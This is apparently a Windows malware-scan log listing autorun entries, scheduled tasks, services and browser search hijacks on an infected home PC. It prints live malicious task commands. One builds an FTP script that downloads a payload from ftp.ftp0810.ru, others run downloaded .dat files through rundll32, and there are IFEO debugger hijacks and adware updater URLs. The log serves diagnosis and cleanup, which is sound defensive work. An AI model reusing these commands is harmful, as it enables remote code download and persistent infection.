HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP Deskjet 3050A J611 series (NET) #2] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN28P6FM2905PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET) #2" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [PCKeeperLive] => "C:\Program Files\Essentware\PCKeeper\PCKeeper.exe" /autorun (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [KGShareApp] => C:\Program Files (x86)\Kodak\KODAK Share Button App\KGShare_App.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP Deskjet 3050A J611 series (NET)] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN18A481V305PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP Deskjet 3050A J611 series (NET) #2] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN28P6FM2905PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET) #2" -AutoStart 1 (No File)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
Task: {0755F16F-16EE-419E-B0E7-0CC9CA968B96} - System32\Tasks\Information-codedownloader => C:\Program Files (x86)\Information\Information-codedownloader.exe /reinstallapp /runfrom=task /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installerfullversion=1.34.2.13 /installationtime=1395509351 /statsdomain=http://stats.srvstat....crossrider.com/defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_code_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' (No File) <==== ATTENTION
Task: {0D23653C-6BD6-4C2E-9B7B-7CDE28991827} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe /PBDADiscovery (No File)
Task: {130F0ABF-F04E-403D-9072-46195AC3C09E} - System32\Tasks\HP AR Program Upload - 5c0f950a1bac498fa00becd99f6716457d4ebca62a29425ca9ed17aa3deb9a58 => C:\Program Files\HP\HP ENVY 7640 series\bin\HPRewards.exe -N 5c0f950a1bac498fa00becd99f6716457d4ebca62a29425ca9ed17aa3deb9a58 -mode Scheduled (No File)
Task: {13E5D543-D30F-47EB-B157-AA513D0E504D} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (No File)
Task: {25C3FE4E-7C48-447D-BAC5-141069528E0A} - System32\Tasks\Information-enabler => C:\Program Files (x86)\Information\Information-enabler.exe /enablebho /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installationtime=1395509351 /statsdomain=http://stats.srvstat...11-110511031168/defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' (No File) <==== ATTENTION
Task: {283FA5F3-05D9-4E45-8612-CC169745945D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPTuneUp.exe [17976 2011-03-22] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {28AA66E5-16C3-4EC8-9431-3904FE03FF88} - System32\Tasks\Information-chromeinstaller => C:\Program Files (x86)\Information\Information-chromeinstaller.exe /rawdata=CViQRH5mq6RiFfs1dwpjt+9N2qmNgqxn/gMF8uZA8OlW0vDxNi/tGrOocS7rwhXjEBo7yMbWzxrQxWDqNx8w5/JiPTO/sapwqscgUIsbIfPxhUuEnUO9ZJmQe7dlPw4isMUzCZtHUEfVrYB2MlvelKtXYZ0l5q5FtI2b3M2qZhC53dfQ9wgAYWB8aP2aq88oTYpNL35iY62bAyllIZV6UjdFHtcFjFPaHDhvPFM6QXclxCvmVE0nz8qEx2TVJN/UjkC7yF2rKmFjL95z9nxvBJlyLbos5kQPg3j0m/QL+1Dkzi/y/KXCgzozW314M6BM4BO7JeNj1CawWv4c03IACrJSWY0/CNj9A/gPNbviTEKOMk0KDxAuVE0YHrSpMHa9lIUw8gjn+JBRlEhQBrnsGQ0o5KplITgN6R0RmfnwzFLgQUtfPDvmsu3BFtASHo0uN7vr4UDpp8qWZPeqQLhKjwoA2dh5GVjeRkGEy5Yg8iek/3UpjcV+vuStKQGdPMItr1reSR5VcuSa9M6rPq+V1IJIy+hA+6KvdJULojj2//tHFd3FiCL9cfcsmQ6Przgl1zNJxrKBUONR0nf9vhWcXABXsWUeTY0Rz3FzUHhoT8BJeCyzxB4Hm6lVs8mjqSqaSBP6ATeHhDclskM+anK8p+zZGMZj3abu/izdOls6rWA/BvBCG1M772AdTz64rDJmncRWrvEJgsvd3Cnh9GLh2dfXb5/buRX/TZDo2CPOn2Iev3bz2yxaOzShl+Fh4DrHOJY8gwHfj0yTAgsVm3AuXwdC5BYoUrwhgZwQjUohYamPx/vaw0FTbcuUWfRbKGN7sOEUuzb5StkPpjZxWAZaKsDvcjDlWbeA58NklL/w64T30KnH/FqwbACtZe0ye+3jk0FZq1XLXs7H6dwOQiaiMj0sIj9yqTO4k9Wzy7jXeenk4KpjXpv0VbOcaThyNWdRaFnFGdy9YsVASfbi4ab29yDiUmQw2rZbIQweIDbNb6b9kuk/cG3ufu5xkLWZRww7U4VSDHQXYffDKvh5dLrt3xjnVVy+xfrEBHzJNqqlygKIdfV8oeulE840lJEjI0delxR50M8cjz90Lriq845m42EM5C45cHadT7qhMpNLiWNcIwRundiGTTDKFGId+N2IY+nIjk7lQ7uEsQJVzCMTglJmndM3Ie+rsjH+b6dM+36Ed7UloEUsIpBisxo+1CoWAIRhNqOfRXPs//fiRMYLMsHLxtzIOZrQJ4HsN/TFvVcYOBc6AxAmPeB6mFBHZDoSKCAWcRdZ13P8UdoK56FFRPtuTNms9UTCV7QfDulw3/FLprZtXIsE3NQ99fjth4kuDxMnlz9n3afcJ2fNppEKLw== (No File) <==== ATTENTION
Task: {2AE04DAF-5396-4938-9FFA-57DDBA863B88} - System32\Tasks\{8406D554-4EE5-437D-8CEA-C0DA8201F0C9} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Mysearchdial\1.8.29.0\uninstall.exe"
Task: {2B9F2E2D-2321-49DB-8AF7-F55BB2B85E2D} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe /DRMInit (No File)
Task: {2F33CB24-7A24-4BC8-8921-4C26EAB0708F} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1250379553-2428740185-3603661230-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe /logoncheck (No File)
Task: {319997A5-00B0-4E61-87B9-3CFCEFCFDD29} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} "C:\Program Files\Common Files\McAfee\Platform\McAMTaskAgent.exe" (No File)
Task: {34EA7168-77B4-42AD-86F8-706253868680} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe /DoActivateWindowsSearch (No File)
Task: {3F599EE8-6731-448E-AFDF-D262B64FBE6A} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (No File)
Task: {50705818-630E-4136-BA82-0DB9119DA4AC} - System32\Tasks\Information-firefoxinstaller => C:\Program Files (x86)\Information\Information-firefoxinstaller.exe -> /installxpi /agentregpath='Information' /extensionfilepath='C:\Program Files (x86)\Information\50368.xpi' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installerfullversion=1.34.2.13 /installationtime=1395509351 /statsdomain=http://stats.srvstat...tforbrowser=300/extensionid=ce85a36c-113a-4928-aa86-88a31bd595e7@aa144f8a-c1f6-481f-991c-18bf0472c970.com /extensionversion=0.93 /prefsbranch=ace85a36c113a4928aa8688a31bd595e7aa144f8ac1f6481f991c18bf0472c970com50368 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/50368.rdf /extensionname='Information' /extensiondesc='Information Helper' /publishername='VisualBee' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' <==== ATTENTION
Task: {566C6850-EE65-4F4F-A90B-8795A8D39A5D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (No File)
Task: {5A2C50FB-9762-4877-81FD-634A43087C10} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe -PvrSchedule (No File)
Task: {5E809149-E296-4004-924E-26A5B98FB90B} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe -ObjectStoreRecoveryTask (No File)
Task: {68518EFB-4CCB-45A7-91E1-7615E98EB147} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe -pscn 0 (No File)
Task: {6C49D8F6-A561-478F-8562-B5B6C36B3542} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {7158081D-DF25-4E71-BC14-844441C6B587} - \MySearchDial -> No File <==== ATTENTION
Task: {7BDAAE08-C707-4305-9740-561B82F7FF91} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe /RestartRecording (No File)
Task: {81D43BF0-31FA-437A-A207-34FBD1EB4443} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe /DoReindexSearchRoot (No File)
Task: {8708676B-C4A6-408D-B706-4030F29488F9} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (No File)
Task: {8D941E7F-F453-4838-AF1D-C0D25D4F3262} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (No File)
Task: {8EE9CB7F-6ABF-497B-80AB-E8EEB72B502C} - System32\Tasks\Information-updater => C:\Program Files (x86)\Information\Information-updater.exe /runupdater /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installationtime=1395509351 /statsdomain=http://stats.srvstat...//ipgeoapi.com//updatejsondomain=http://update.srvstatsdata.com /updaterversion=2 /monetizationdomain=http://stats.mstatsserv.com /autoupdateulr='http://update.srvstatsdata.com/updater_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' (No File) <==== ATTENTION
Task: {8FB062A9-BD13-42B5-B65F-B285C09B088E} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe /doScheduledScan (No File)
Task: {9EC65580-F30B-49AD-B23D-E6619DA3685B} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {A26E4F53-0C1D-47E6-93D4-2B1380751BD0} - \Mysa -> No File <==== ATTENTION
Task: {A4417F75-2B1A-43EF-B93B-A68027897A14} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe -SqlLiteRecoveryTask (No File)
Task: {A9206F35-0D9A-40E5-95E7-8C15E7CEC916} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe -PvrRecoveryTask (No File)
Task: {B4C24072-CB73-494D-A505-7A40E3341278} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe [7680 2022-03-28] () [File not signed] <==== ATTENTION
Task: {BCB60D00-1E83-4159-A3BA-5432DB9EA769} - System32\Tasks\RunAsStdUser Task => C:\Users\Marilyn\AppData\Local\Temp\{86D4B82A-ABED-442A-BE86-96357B70F4FE}\RunIE.exe -secondattempt http://sp.ask.com/to...ccess=1(NoFile)<==== ATTENTION
Task: {C7EE3052-AD50-4721-9A35-2ED1ADF2BEA4} - \Mysa3 -> No File <==== ATTENTION
Task: {C8A0777B-EC92-4B1A-A2B9-ABFBC4AD5908} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (No File)
Task: {C9E3D7FF-0540-40E1-BD19-0D3BE6985F4E} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\Windows\TEMP\{36888087-FCC5-4335-9E96-ACA2D2A95DAE}.exe --uninstall=1 (No File) <==== ATTENTION
Task: {CF9A5C01-BEE9-4B79-A201-E0D630BE6804} - System32\Tasks\McAfeeLogon => C:\PROGRA~1\COMMON~1\McAfee\Platform\McUICnt.exe /platui /runkey (No File)
Task: {D0CA8ECB-D919-4545-AF78-12493EE2D0DB} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1250379553-2428740185-3603661230-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe /scheduledcheck (No File)
Task: {E374BBA4-EB46-4781-AF08-529748B61381} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe /StartRecording (No File)
Task: {E3E9FED2-6ED8-4C53-B7D7-8011E13B7949} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe RecoveryCDWin7 ShowMessageTask (No File)
Task: {EB21D51D-6372-4112-BA3A-8C465667B9D7} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (No File)
Task: {ED218DFE-D778-4991-AA1F-58CC4A678280} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (No File)
Task: {F197CC66-BBE6-48B8-A8FC-73595165CA95} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe /OCURActivate (No File)
Task: {F7430C5F-32A2-44D7-8618-ACC01D88C2F0} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe -crl -hms -pscn 15 (No File)
Task: {F8C2130E-A883-46E4-81C7-3F4E090DA514} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe $(Arg0) (No File)
Task: {FEEB404D-FF5E-4BA3-8E14-BFF9D5D072B1} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: C:\Windows\Tasks\MySearchDial.job => C:\Users\Marilyn\AppData\Roaming\MYSEAR~1\UPDATE~1\UPDATE~1.EXE
Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
IPSecPolicy: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{f40293b7-4e08-4a64-904a-4c25ff731d56} <==== ATTENTION (Restriction - IP)
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]
CHR HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]
S2 ehRecvr; %systemroot%\ehome\ehRecvr.exe [X]
S2 ehSched; %systemroot%\ehome\ehsched.exe [X]
S2 McAPExe; "C:\Program Files\Common Files\McAfee\VSCore_15_6\McApExe.exe" [X]
S2 mccspsvc; "C:\Program Files\Common Files\McAfee\CSP\2.3.253.0\\McCSPServiceHost.exe" [X]
S3 mfefire; "C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe" [X]
S2 mfemms; "C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe" [X]
S2 ModuleCoreService; "C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe" [X]
S2 MsF928BDEEApp; C:\Windows\System32\MsF928BDEEApp.dll [X]
S2 mssecsvc2.0; C:\WINDOWS\mssecsvc.exe -m security [X]
S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
S2 PEFService; "C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe" [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 vzandnetdiag; system32\DRIVERS\lgvzandnetdiag64.sys [X]
S3 vzandnetdiag2; system32\DRIVERS\lgvzandnetdiag264.sys [X]
S3 vzandnetmodem; system32\DRIVERS\lgvzandnetmdm64.sys [X]
S3 vzandnetndis; system32\DRIVERS\lgvzandnetndis64.sys [X]
ContextMenuHandlers4: [MSSE] -> {0365FE2C-F183-4091-AC82-BFC39FB75C49} => -> No File
ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 - (No Name) - {575bddf5-790a-4d01-a37d-2863dec1c085} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 - (No Name) - {575bddf5-790a-4d01-a37d-2863dec1c085} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {8a7d2060-824d-4b17-b00a-759b1b5f30d9} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {26842a09-ffa8-4e2c-ae12-0c80f01c3295} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {575bddf5-790a-4d01-a37d-2863dec1c085} - No File
URLSearchHook: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=app_14_12_ie&cd=2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0SzztCtBtN1L2XzutBtFtCzztFyBtFtDtN1L1CzutCyEtDtAtDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StBtBzz0DyByDyBtDtG0AtC0BtBtG0C0FzzyDtGyC0ByB0DtGyE0CtByC0ByDtB0EtByByE0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCyB0AyCyE0BzyzytG0EyEtCyEtG0FyD0AyCtGtB0E0CtBtGyCtA0FtA0D0FyEyB0D0AyEzz2Q&cr=9292952&ir=
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
SearchScopes: HKLM -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM-x32 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm011YYus&ptb=27ACC159-EE0E-4BC7-9AF7-0AD838A4715E&ind=2012012609&ptnrS=UXxdm011YYus&si=maps4pc&n=77ece041&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM-x32 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\.DEFAULT -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {4937BE7D-D79B-4503-916B-57CD4454756C} URL = hxxp://websearch.shopathome.com?user_id={2F05AB4E-12C0-40B1-A060-7D2D2A519D8A}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
